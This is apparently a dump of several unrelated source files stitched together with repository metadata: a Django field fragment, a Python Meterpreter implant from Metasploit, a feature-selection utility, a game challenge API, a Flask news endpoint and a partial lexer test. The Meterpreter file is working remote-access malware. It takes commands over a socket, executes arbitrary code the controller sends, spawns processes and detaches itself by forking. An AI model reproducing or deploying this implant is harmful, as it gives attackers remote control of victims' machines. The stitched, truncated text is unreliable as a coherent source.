policy = MarkdownxField()
| 33.041667
| 108
| 0.698298
| 3,034
| 0.956494
| 0
| 0
| 0
| 0
| 0
| 0
| 482
| 0.151955
|
b81415a0a71fcac22aeb01aa39ba0c4dc0f68e8c
| 13,866
|
py
|
Python
|
data/meterpreter/meterpreter.py
|
codex8/metasploit-framework
|
eb745af12fe591e94f8d6ce9dac0396d834991ab
|
[
"Apache-2.0",
"BSD-3-Clause"
] | 1
|
2015-11-05T21:38:38.000Z
|
2015-11-05T21:38:38.000Z
|
data/meterpreter/meterpreter.py
|
codex8/metasploit-framework
|
eb745af12fe591e94f8d6ce9dac0396d834991ab
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
data/meterpreter/meterpreter.py
|
codex8/metasploit-framework
|
eb745af12fe591e94f8d6ce9dac0396d834991ab
|
[
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/python
import code
import ctypes
import os
import random
import select
import socket
import struct
import subprocess
import sys
import threading
has_windll = hasattr(ctypes, 'windll')
#
# Constants
#
PACKET_TYPE_REQUEST = 0
PACKET_TYPE_RESPONSE = 1
PACKET_TYPE_PLAIN_REQUEST = 10
PACKET_TYPE_PLAIN_RESPONSE = 11
ERROR_SUCCESS = 0
# not defined in original C implementation
ERROR_FAILURE = 1
CHANNEL_CLASS_BUFFERED = 0
CHANNEL_CLASS_STREAM = 1
CHANNEL_CLASS_DATAGRAM = 2
CHANNEL_CLASS_POOL = 3
#
# TLV Meta Types
#
TLV_META_TYPE_NONE = ( 0 )
TLV_META_TYPE_STRING = (1 << 16)
TLV_META_TYPE_UINT = (1 << 17)
TLV_META_TYPE_RAW = (1 << 18)
TLV_META_TYPE_BOOL = (1 << 19)
TLV_META_TYPE_COMPRESSED = (1 << 29)
TLV_META_TYPE_GROUP = (1 << 30)
TLV_META_TYPE_COMPLEX = (1 << 31)
# not defined in original
TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
#
# TLV base starting points
#
TLV_RESERVED = 0
TLV_EXTENSIONS = 20000
TLV_USER = 40000
TLV_TEMP = 60000
#
# TLV Specific Types
#
TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
TLV_TYPE_SEEK_WHENCE = TLV_META_TYPE_UINT | 70
TLV_TYPE_SEEK_OFFSET = TLV_META_TYPE_UINT | 71
TLV_TYPE_SEEK_POS = TLV_META_TYPE_UINT | 72
TLV_TYPE_EXCEPTION_CODE = TLV_META_TYPE_UINT | 300
TLV_TYPE_EXCEPTION_STRING = TLV_META_TYPE_STRING | 301
TLV_TYPE_LIBRARY_PATH = TLV_META_TYPE_STRING | 400
TLV_TYPE_TARGET_PATH = TLV_META_TYPE_STRING | 401
TLV_TYPE_MIGRATE_PID = TLV_META_TYPE_UINT | 402
TLV_TYPE_MIGRATE_LEN = TLV_META_TYPE_UINT | 403
TLV_TYPE_CIPHER_NAME = TLV_META_TYPE_STRING | 500
TLV_TYPE_CIPHER_PARAMETERS = TLV_META_TYPE_GROUP | 501
def generate_request_id():
chars = 'abcdefghijklmnopqrstuvwxyz'
return ''.join(random.choice(chars) for x in xrange(32))
def packet_get_tlv(pkt, tlv_type):
offset = 0
while (offset < len(pkt)):
tlv = struct.unpack('>II', pkt[offset:offset+8])
if (tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type:
val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
val = val.split('\x00', 1)[0]
elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
val = struct.unpack('>I', val)[0]
elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
val = bool(struct.unpack('b', val)[0])
elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
pass
return {'type':tlv[1], 'length':tlv[0], 'value':val}
offset += tlv[0]
return {}
def tlv_pack(*args):
if len(args) == 2:
tlv = {'type':args[0], 'value':args[1]}
else:
tlv = args[0]
data = ""
if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
data = struct.pack('>II', 8 + len(tlv['value']) + 1, tlv['type']) + tlv['value'] + '\x00'
elif (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
data = struct.pack('>III', 12, tlv['type'], tlv['value'])
elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
data = struct.pack('>II', 9, tlv['type']) + chr(int(bool(tlv['value'])))
elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP:
data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX:
data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value']
return data
class STDProcessBuffer(threading.Thread):
def __init__(self, std, is_alive):
threading.Thread.__init__(self)
self.std = std
self.is_alive = is_alive
self.data = ''
self.data_lock = threading.RLock()
def run(self):
while self.is_alive():
byte = self.std.read(1)
self.data_lock.acquire()
self.data += byte
self.data_lock.release()
self.data_lock.acquire()
self.data += self.std.read()
self.data_lock.release()
def is_read_ready(self):
return len(self.data) != 0
def read(self, l = None):
data = ''
self.data_lock.acquire()
if l == None:
data = self.data
self.data = ''
else:
data = self.data[0:l]
self.data = self.data[l:]
self.data_lock.release()
return data
class STDProcess(subprocess.Popen):
def __init__(self, *args, **kwargs):
subprocess.Popen.__init__(self, *args, **kwargs)
def start(self):
self.stdout_reader = STDProcessBuffer(self.stdout, lambda: self.poll() == None)
self.stdout_reader.start()
self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None)
self.stderr_reader.start()
class PythonMeterpreter(object):
def __init__(self, socket):
self.socket = socket
self.extension_functions = {}
self.channels = {}
self.interact_channels = []
self.processes = {}
for func in filter(lambda x: x.startswith('_core'), dir(self)):
self.extension_functions[func[1:]] = getattr(self, func)
self.running = True
def register_function(self, func):
self.extension_functions[func.__name__] = func
def register_function_windll(self, func):
if has_windll:
self.register_function(func)
def add_channel(self, channel):
idx = 0
while idx in self.channels:
idx += 1
self.channels[idx] = channel
return idx
def add_process(self, process):
idx = 0
while idx in self.processes:
idx += 1
self.processes[idx] = process
return idx
def run(self):
while self.running:
if len(select.select([self.socket], [], [], 0)[0]):
request = self.socket.recv(8)
if len(request) != 8:
break
req_length, req_type = struct.unpack('>II', request)
req_length -= 8
request = ''
while len(request) < req_length:
request += self.socket.recv(4096)
response = self.create_response(request)
self.socket.send(response)
else:
channels_for_removal = []
channel_ids = self.channels.keys() # iterate over the keys because self.channels could be modified if one is closed
for channel_id in channel_ids:
channel = self.channels[channel_id]
data = ''
if isinstance(channel, STDProcess):
if not channel_id in self.interact_channels:
continue
if channel.stdout_reader.is_read_ready():
data = channel.stdout_reader.read()
elif channel.stderr_reader.is_read_ready():
data = channel.stderr_reader.read()
elif channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
elif isinstance(channel, socket._socketobject):
while len(select.select([channel.fileno()], [], [], 0)[0]):
try:
d = channel.recv(1)
except socket.error:
d = ''
if len(d) == 0:
self.handle_dead_resource_channel(channel_id)
break
data += d
if data:
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_write')
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
pkt += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
pkt += tlv_pack(TLV_TYPE_LENGTH, len(data))
pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.socket.send(pkt)
def handle_dead_resource_channel(self, channel_id):
del self.channels[channel_id]
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_close')
pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.socket.send(pkt)
def _core_loadlib(self, request, response):
data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
return ERROR_FAILURE
preloadlib_methods = self.extension_functions.keys()
i = code.InteractiveInterpreter({'meterpreter':self, 'packet_get_tlv':packet_get_tlv, 'tlv_pack':tlv_pack, 'STDProcess':STDProcess})
i.runcode(compile(data_tlv['value'], '', 'exec'))
postloadlib_methods = self.extension_functions.keys()
new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods)
for method in new_methods:
response += tlv_pack(TLV_TYPE_METHOD, method)
return ERROR_SUCCESS, response
def _core_shutdown(self, request, response):
response += tlv_pack(TLV_TYPE_BOOL, True)
self.running = False
return ERROR_SUCCESS, response
def _core_channel_open(self, request, response):
channel_type = packet_get_tlv(request, TLV_TYPE_CHANNEL_TYPE)
handler = 'channel_create_' + channel_type['value']
if handler not in self.extension_functions:
return ERROR_FAILURE, response
handler = self.extension_functions[handler]
return handler(request, response)
def _core_channel_close(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
if isinstance(channel, file):
channel.close()
elif isinstance(channel, subprocess.Popen):
channel.kill()
elif isinstance(s, socket._socketobject):
channel.close()
else:
return ERROR_FAILURE, response
del self.channels[channel_id]
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
return ERROR_SUCCESS, response
def _core_channel_eof(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
result = False
if isinstance(channel, file):
result = channel.tell() == os.fstat(channel.fileno()).st_size
response += tlv_pack(TLV_TYPE_BOOL, result)
return ERROR_SUCCESS, response
def _core_channel_interact(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
toggle = packet_get_tlv(request, TLV_TYPE_BOOL)['value']
if toggle:
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
else:
self.interact_channels.append(channel_id)
elif channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
return ERROR_SUCCESS, response
def _core_channel_read(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
data = ''
if isinstance(channel, file):
data = channel.read(length)
elif isinstance(channel, STDProcess):
if channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
if channel.stdout_reader.is_read_ready():
data = channel.stdout_reader.read(length)
elif isinstance(s, socket._socketobject):
data = channel.recv(length)
else:
return ERROR_FAILURE, response
response += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
return ERROR_SUCCESS, response
def _core_channel_write(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
channel_data = packet_get_tlv(request, TLV_TYPE_CHANNEL_DATA)['value']
length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
l = len(channel_data)
if isinstance(channel, file):
channel.write(channel_data)
elif isinstance(channel, subprocess.Popen):
if channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
return ERROR_FAILURE, response
channel.stdin.write(channel_data)
elif isinstance(s, socket._socketobject):
try:
l = channel.send(channel_data)
except socket.error:
channel.close()
self.handle_dead_resource_channel(channel_id)
return ERROR_FAILURE, response
else:
return ERROR_FAILURE, response
response += tlv_pack(TLV_TYPE_LENGTH, l)
return ERROR_SUCCESS, response
def create_response(self, request):
resp = struct.pack('>I', PACKET_TYPE_RESPONSE)
method_tlv = packet_get_tlv(request, TLV_TYPE_METHOD)
resp += tlv_pack(method_tlv)
reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID)
resp += tlv_pack(reqid_tlv)
if method_tlv['value'] in self.extension_functions:
handler = self.extension_functions[method_tlv['value']]
try:
result, resp = handler(request, resp)
except Exception, err:
result = ERROR_FAILURE
else:
result = ERROR_FAILURE
resp += tlv_pack(TLV_TYPE_RESULT, result)
resp = struct.pack('>I', len(resp) + 4) + resp
return resp
if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
if hasattr(os, 'setsid'):
os.setsid()
met = PythonMeterpreter(s)
met.run()
| 33.737226
| 134
| 0.706044
| 9,262
| 0.667965
| 0
| 0
| 0
| 0
| 0
| 0
| 799
| 0.057623
|
b814b973d8e54a857c2c3fc248c1064d45ba00c1
| 8,599
|
py
|
Python
|
utils/dev/feature.py
|
brunocvs7/bot_detection_twitter_profile_features
|
44a88b0774bdab33da78f7679e109ccd8c34f4df
|
[
"MIT"
] | 1
|
2021-11-03T02:22:57.000Z
|
2021-11-03T02:22:57.000Z
|
utils/dev/feature.py
|
brunocvs7/bot_detection_twitter_profile_features
|
44a88b0774bdab33da78f7679e109ccd8c34f4df
|
[
"MIT"
] | null | null | null |
utils/dev/feature.py
|
brunocvs7/bot_detection_twitter_profile_features
|
44a88b0774bdab33da78f7679e109ccd8c34f4df
|
[
"MIT"
] | 1
|
2021-11-01T00:49:07.000Z
|
2021-11-01T00:49:07.000Z
|
from sklearn.preprocessing import MinMaxScaler
from sklearn.pipeline import Pipeline
from scipy.stats import chi2_contingency
from sklearn.compose import ColumnTransformer
from boruta import BorutaPy
from sklearn.ensemble import RandomForestClassifier
from sklearn.preprocessing import OrdinalEncoder
from sklearn.impute import SimpleImputer
from scipy.stats import pointbiserialr
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import StratifiedKFold, cross_val_score
import pandas as pd
import numpy as np
def point_biserial(df, y, num_columns = None, significance=0.05):
'''
Perform feature selection based on correlation test.
Parameters:
df (pandas.dataframe): A dataframe containing all features and target
num_columns (list): A list containing all categorical features. If empty list, the function tries to infer the categorical columns itself
y (string): A string indicating the target.
Returns:
columns_remove_pb (list):
'''
correlation = []
p_values = []
results = []
if num_columns:
num_columns = num_columns
else:
num_columns = df.select_dtypes(include=['int','float', 'int32', 'float64']).columns.tolist()
for col in num_columns:
df[col] = df[col].fillna(df[col].median())
correlation_aux, p_value_aux = pointbiserialr(df[col], df[y])
correlation.append(correlation_aux)
p_values.append(p_value_aux)
if p_value_aux <= significance:
results.append('Reject H0')
else:
results.append('Accept H0')
pb_df = pd.DataFrame({'column':num_columns, 'correlation':correlation, 'p_value':p_values, 'result':results})
columns_remove_pb = pb_df.loc[pb_df['result']=='Accept H0']['column'].values.tolist()
return pb_df, columns_remove_pb
class Boruta:
"""
A class to perform feature selection, based on BorutaPy Class of boruta package
This version is based only on feature importance of a random forest model and returns results more pretifully
See https://github.com/scikit-learn-contrib/boruta_py for more details (original implementation)
...
Attributes
----------
n_iter : int
number of iterations the algorithm will perform
columns_removed : list
list of columns to be removed (Obtained after fit method runs)
Methods
-------
fit(X, y):
Runs Boruta Algorithm. It brings a list of columns We should remove and a boolean vetor.
"""
def __init__(self, n_iter=100):
"""
Constructs all the necessary attributes for the boruta object.
Parameters
----------
n_iter : int
number of iterations the algorithm will perform
"""
self.n_iter = n_iter
self._columns_remove_boruta = None
self._bool_decision = None
self._best_features = None
def fit(self, X, y, cat_columns=True, num_columns=True):
"""
Runs Boruta Algorithm.
Parameters
----------
X : pandas.dataframe
Pandas Data Frame with all features
y: pandas.dataframe
Pandas Data Frame with target
Returns
-------
None
"""
X.replace(to_replace=[None], value=np.nan, inplace=True)
if (num_columns == False) & (cat_columns == True):
cat_columns = X.select_dtypes(include=['object']).columns.tolist()
X.loc[:, cat_columns] = X.loc[:, cat_columns].astype('str')
cat_pipe_preprocessor = Pipeline(steps = [('imputer', SimpleImputer(strategy = 'most_frequent')), ('cat_transformer', OrdinalEncoder())])
preprocessor = ColumnTransformer(transformers = [('cat_pipe_preprocessor', cat_pipe_preprocessor, cat_columns)])
X_processed = preprocessor.fit_transform(X)
rf = RandomForestClassifier(n_jobs=-1, class_weight='balanced', max_depth=5, random_state=123)
# Criando o boruta
selector = BorutaPy(rf, n_estimators='auto',random_state=123, max_iter = self.n_iter)
selector.fit(X,y)
elif (cat_columns==False) & (num_columns==True):
num_columns = X.select_dtypes(include=['int','float']).columns.tolist()
num_pipe_preprocessor = Pipeline(steps= [('imputer',SimpleImputer(strategy = 'median'))])
preprocessor = ColumnTransformer(transformers = [('num_pipe_preprocessor',num_pipe_preprocessor, num_columns)])
X_processed = preprocessor.fit_transform(X)
rf = RandomForestClassifier(n_jobs=-1, class_weight='balanced', max_depth=5, random_state=123)
# Criando o boruta
selector = BorutaPy(rf, n_estimators='auto',random_state=123, max_iter = self.n_iter)
selector.fit(X_processed,y)
else:
cat_columns = X.select_dtypes(include=['object']).columns.tolist()
X.loc[:, cat_columns] = X.loc[:, cat_columns].astype('str')
num_columns = X.select_dtypes(include=['int','float']).columns.tolist()
num_pipe_preprocessor = Pipeline(steps= [('imputer',SimpleImputer(strategy = 'median'))])
cat_pipe_preprocessor = Pipeline(steps = [('imputer', SimpleImputer(strategy = 'most_frequent')), ('cat_transformer', OrdinalEncoder())])
preprocessor = ColumnTransformer(transformers = [('num_pipe_preprocessor',num_pipe_preprocessor, num_columns), ('cat_pipe_preprocessor', cat_pipe_preprocessor, cat_columns)])
X_processed = preprocessor.fit_transform(X)
rf = RandomForestClassifier(n_jobs=-1, class_weight='balanced', max_depth=5, random_state=123)
# Criando o boruta
selector = BorutaPy(rf, n_estimators='auto',random_state=123, max_iter = self.n_iter)
selector.fit(X_processed,y)
bool_decision = [not x for x in selector.support_.tolist()] # apenas invertendo o vetor de true/false
columns_remove_boruta = X.loc[:,bool_decision].columns.tolist()
columns_keep_boruta = X.loc[:,selector.support_.tolist()].columns.tolist()
self._columns_remove_boruta = columns_remove_boruta
self._bool_decision = bool_decision
self._best_features = columns_keep_boruta
def chi_squared(df, y, cat_columns = None, significance=0.05):
'''
Performs chi2 hypothesis test to find relationship between predictors and target in a data frame
Parameters:
df (pandas.dataframe): A data frame containing categorical features and target variable
y (string): A string that saves the name of target variable
cat_columns (list): A list with the name of categorical features. If None, function tries to infer It by itself
significance (float): A float number indicating the significance level for the test. Deafult is 0.05
Retorna:
chi2_df (pandas.dataframe): A data frame with the results of the tests
columns_remove_chi2 (list): A list of columns that should be removed
logs (list): A list of columns that could not be evaluated
'''
p_values = []
logs = []
chi2_results = []
results = []
if cat_columns == None:
cat_columns = df.select_dtypes(['object']).columns.tolist()
else:
cat_columns = cat_columns
for cat in cat_columns:
cross_table = pd.crosstab(df[cat], df[y])
if not cross_table[cross_table < 5 ].count().any():
cross_table = pd.crosstab(df[cat], df[y])
chi2, p, dof, expected = chi2_contingency(cross_table.values)
chi2_results.append(chi2)
p_values.append(p)
else:
logs.append("Column {} could'nt be evaluated".format(cat))
chi2_results.append(np.nan)
p_values.append(np.nan)
for p in p_values:
if p <= significance:
results.append('Reject H0')
else:
results.append('Accept H0')
chi2_df = pd.DataFrame({"column":cat_columns, 'p-value':p_values,'chi2':chi2_results, 'results':results})
columns_remove_chi2 = chi2_df.loc[chi2_df['results']=='Accept H0']['column'].values.tolist()
return chi2_df, columns_remove_chi2, logs
| 41.946341
| 186
| 0.636818
| 4,459
| 0.518549
| 0
| 0
| 0
| 0
| 0
| 0
| 3,122
| 0.363065
|
b814f40aa31389fa14c7b83364d7da4918d56140
| 6,293
|
py
|
Python
|
apiserver/apiserver/web/challenge.py
|
AlexParra03/Halite-III
|
1f108a0d9a07397400621e9a7ccefd7f4f13fee2
|
[
"MIT"
] | 1
|
2021-07-01T20:57:24.000Z
|
2021-07-01T20:57:24.000Z
|
apiserver/apiserver/web/challenge.py
|
the-higgs/Halite-III
|
1f108a0d9a07397400621e9a7ccefd7f4f13fee2
|
[
"MIT"
] | null | null | null |
apiserver/apiserver/web/challenge.py
|
the-higgs/Halite-III
|
1f108a0d9a07397400621e9a7ccefd7f4f13fee2
|
[
"MIT"
] | null | null | null |
"""
User challenge API endpoints - list user's challenges & issue new ones
"""
import datetime
import flask
import sqlalchemy
from .. import model, util
from . import match as match_api
from . import util as api_util
from .blueprint import web_api
def make_challenge_record(challenge, participants):
result = {
"challenge_id": challenge["id"],
"time_created": challenge["created"],
"time_finished": challenge["finished"],
"num_games": challenge["num_games"],
"issuer": challenge["issuer"],
"winner": challenge["winner"],
"finished": bool(challenge["finished"]),
"players": {},
}
for participant in participants:
result["players"][participant["user_id"]] = {
"username": participant["username"],
"profile_image_key": participant["profile_image_key"],
"points": participant["points"],
"is_issuer": participant["user_id"] == result["issuer"],
}
return result
def get_challenge_helper(challenge_id):
with model.read_conn() as conn:
query = sqlalchemy.sql.select([
model.challenges.c.id,
model.challenges.c.created,
model.challenges.c.finished,
model.challenges.c.num_games,
model.challenges.c.issuer,
model.challenges.c.winner,
]).select_from(model.challenges).where(
model.challenges.c.id == challenge_id
).reduce_columns()
challenge = conn.execute(query).first()
if not challenge:
raise util.APIError(
404,
message="Challenge {} not found.".format(challenge_id))
participants = conn.execute(
model.challenge_participants.join(
model.all_users,
model.challenge_participants.c.user_id == model.all_users.c.user_id
).select(
model.challenge_participants.c.challenge_id == challenge["id"]
)
)
return make_challenge_record(challenge, participants)
def list_challenges_helper(offset, limit, participant_clause,
where_clause, order_clause, user_id=None):
with model.read_conn() as conn:
if user_id is not None:
# See if user is part of a team, and add to participant
# clause
team = conn.execute(model.team_leader_query(user_id)).first()
if team:
participant_clause &= model.challenge_participants.c.user_id.in_([
user_id,
team["leader_id"],
])
else:
participant_clause &= model.challenge_participants.c.user_id == user_id
query = sqlalchemy.sql.select([
model.challenges.c.id,
model.challenges.c.created,
model.challenges.c.finished,
model.challenges.c.num_games,
model.challenges.c.issuer,
model.challenges.c.winner,
]).select_from(model.challenges).where(
where_clause &
sqlalchemy.sql.exists(model.challenge_participants.select(
participant_clause &
(model.challenges.c.id == model.challenge_participants.c.challenge_id)
).correlate(model.challenges))
).order_by(*order_clause).offset(offset).limit(limit).reduce_columns()
challenges = conn.execute(query)
result = []
for challenge in challenges.fetchall():
participants = conn.execute(sqlalchemy.sql.select([
model.challenge_participants.c.user_id,
model.challenge_participants.c.points,
model.users.c.username,
model.users.c.oauth_profile_image_key.label("profile_image_key"),
]).select_from(model.challenge_participants.join(
model.users,
model.challenge_participants.c.user_id == model.users.c.id
)).where(
model.challenge_participants.c.challenge_id == challenge["id"]
)).fetchall()
result.append(make_challenge_record(challenge, participants))
return result
@web_api.route("/challenge", methods=["GET"])
@util.cross_origin(methods=["GET"])
def list_challenges():
offset, limit = api_util.get_offset_limit()
where_clause, order_clause, manual_sort = api_util.get_sort_filter({
"issuer": model.challenges.c.issuer,
"created": model.challenges.c.created,
"finished": model.challenges.c.finished,
"num_games": model.challenges.c.num_games,
"winner": model.challenges.c.winner,
"status": model.challenges.c.status,
"id": model.challenges.c.id,
}, ["finished", "participant"])
participant_clause = sqlalchemy.true()
for (field, op, val) in manual_sort:
if field == "finished":
where_clause &= model.challenges.c.status == "finished"
elif field == "participant":
participant_clause &= op(model.challenge_participants.c.user_id, val)
result = list_challenges_helper(offset, limit,
participant_clause,
where_clause, order_clause)
return flask.jsonify(result)
@web_api.route("/challenge/<int:challenge_id>", methods=["GET"])
@util.cross_origin(methods=["GET"])
def get_challenge(challenge_id):
result = get_challenge_helper(challenge_id)
return flask.jsonify(result)
@web_api.route("/challenge/<int:challenge_id>/match", methods=["GET"])
@util.cross_origin(methods=["GET"])
def list_challenge_matches(challenge_id):
offset, limit = api_util.get_offset_limit()
where_clause, order_clause, manual_sort = api_util.get_sort_filter({
"game_id": model.games.c.id,
"time_played": model.games.c.time_played,
}, ["timed_out"])
participant_clause = sqlalchemy.true()
where_clause &= model.games.c.challenge_id == challenge_id
for (field, _, _) in manual_sort:
if field == "timed_out":
participant_clause &= model.game_participants.c.timed_out
result = match_api.list_matches_helper(
offset, limit, participant_clause, where_clause, order_clause)
return flask.jsonify(result)
| 36.587209
| 87
| 0.622755
| 0
| 0
| 0
| 0
| 2,079
| 0.330367
| 0
| 0
| 741
| 0.11775
|
b8155fb4487ab6eefaea72ef47aa753b0a19b9bd
| 264
|
py
|
Python
|
txtjokes/urls.py
|
paqman85/txtjokes
|
d5b9faa1fd3f797c2feee277b8cd428cc05a17ed
|
[
"MIT"
] | 1
|
2020-12-08T19:00:33.000Z
|
2020-12-08T19:00:33.000Z
|
txtjokes/urls.py
|
paqman85/txtjokes
|
d5b9faa1fd3f797c2feee277b8cd428cc05a17ed
|
[
"MIT"
] | 3
|
2021-03-30T13:47:03.000Z
|
2021-09-22T19:03:46.000Z
|
txtjokes/urls.py
|
paqman85/txtjokes
|
d5b9faa1fd3f797c2feee277b8cd428cc05a17ed
|
[
"MIT"
] | 1
|
2020-04-24T14:39:03.000Z
|
2020-04-24T14:39:03.000Z
|
from django.conf import settings
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('txt-jokes-administratus/', admin.site.urls),
path('accounts/', include('allauth.urls')),
path('', include('pages.urls')),
]
| 24
| 54
| 0.704545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 65
| 0.246212
|
b8180b5b5c77d3a1a684f4f02028d017f4b7a210
| 1,909
|
py
|
Python
|
newsservice/requestnews.py
|
mohawk781/newsservice
|
0b7007c632211e35000dfba5e8ff9f23cff9450d
|
[
"Apache-2.0"
] | null | null | null |
newsservice/requestnews.py
|
mohawk781/newsservice
|
0b7007c632211e35000dfba5e8ff9f23cff9450d
|
[
"Apache-2.0"
] | 1
|
2021-06-01T23:59:17.000Z
|
2021-06-01T23:59:17.000Z
|
newsservice/requestnews.py
|
mohawk781/newsservice
|
0b7007c632211e35000dfba5e8ff9f23cff9450d
|
[
"Apache-2.0"
] | 1
|
2019-09-06T10:51:08.000Z
|
2019-09-06T10:51:08.000Z
|
import json
from newsservice.models import News
from flask import (Blueprint, request)
bp = Blueprint('request', __name__)
@bp.route('/requestnews', methods=['GET', 'POST'])
def requestdb():
"""
This Method receives filter values as a JSON and uses these to make queries at the database.
It creates a List with all entries of the database which match the filters.
Then it converts the list to a JSON document.
:return: JSON document containing all database entries which matches the filter values.
"""
data = []
articles = News.query.all()
if request.json['id'] != "":
articles = [article for article in articles if str(article.id) == request.json['id']]
if request.json['tag'] != "":
articles = [article for article in articles if article.tag == request.json['tag']]
if request.json['author'] != "":
articles = [article for article in articles if request.json['author'] in article.author]
if request.json['title'] != "":
articles = [article for article in articles if request.json['title'] in article.title]
if request.json['text'] != "":
articles = [article for article in articles if request.json['text'] in article.text]
if request.json['facilityid'] != "":
articles = [article for article in articles if request.json['facilityid'] in article.facilityid]
if request.json['older'] != "":
articles = [article for article in articles if article.time <= request.json['older']]
if request.json['newer'] != "":
articles = [article for article in articles if article.time >= request.json['newer']]
for article in articles:
data.insert(0, {'id': article.id, 'title': article.title, 'author': article.author, 'time': article.time, 'tag': article.tag,
'text': article.text, 'facilityid': article.facilityid})
return json.dumps(data)
| 38.959184
| 133
| 0.655317
| 0
| 0
| 0
| 0
| 1,781
| 0.932949
| 0
| 0
| 540
| 0.282871
|
b8185170e7135ee17602f233ff3d6eb5d6bbc140
| 943
|
py
|
Python
|
tests/test_lexer.py
|
movermeyer/rexlex
|
6c451a3b7e9134cbdf895a7ec5682e480480ef1a
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_lexer.py
|
movermeyer/rexlex
|
6c451a3b7e9134cbdf895a7ec5682e480480ef1a
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_lexer.py
|
movermeyer/rexlex
|
6c451a3b7e9134cbdf895a7ec5682e480480ef1a
|
[
"BSD-3-Clause"
] | 1
|
2018-03-05T00:40:04.000Z
|
2018-03-05T00:40:04.000Z
|
import re
import unittest
from rexlex import Lexer
from rexlex.lexer.itemclass import get_itemclass
class TestableLexer(Lexer):
"""Test tuple state transitions including #pop."""
LOGLEVEL = None
re_skip = re.compile('\s+')
tokendefs = {
'root': [
('Root', 'a', 'bar'),
('Root', 'e'),
],
'foo': [
